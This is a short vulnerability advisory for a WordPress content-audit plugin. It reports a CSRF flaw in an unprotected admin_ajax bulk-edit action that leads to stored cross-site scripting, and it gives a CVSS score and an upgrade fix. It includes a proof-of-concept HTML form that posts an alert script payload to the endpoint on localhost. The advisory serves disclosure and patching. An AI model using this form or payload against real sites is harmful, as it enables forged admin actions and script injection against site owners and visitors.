CVSS Summary
Score | 5.8 Medium |
---|---|
Vector | Network |
Complexity | Medium |
Authentication | None |
Confidentiality | Partial |
Integrity | Partial |
Availability | None |
Last revised:
The plugin contains an admin_ajax action which is not protected with a nonce. One of the values submitted appears unescaped on the list of pages.
Current state: Fixed
Score | 5.8 Medium |
---|---|
Vector | Network |
Complexity | Medium |
Authentication | None |
Confidentiality | Partial |
Integrity | Partial |
Availability | None |
<form method="POST" action="http://localhost/wp-admin/admin-ajax.php?action=content_audit_save_bulk_edit"> <input type="text" name="post_ids[]" value="2"> <input type="text" name="_content_audit_owner" value="Elliot Alderson"> <input type="text" name="_content_audit_expiration_date" value="2020-01-01"> <input type="text" name="_content_audit_notes" value="<script>alert(1)</script>"> <input type="submit"> </form>
Upgrade to version 1.9.2 or later.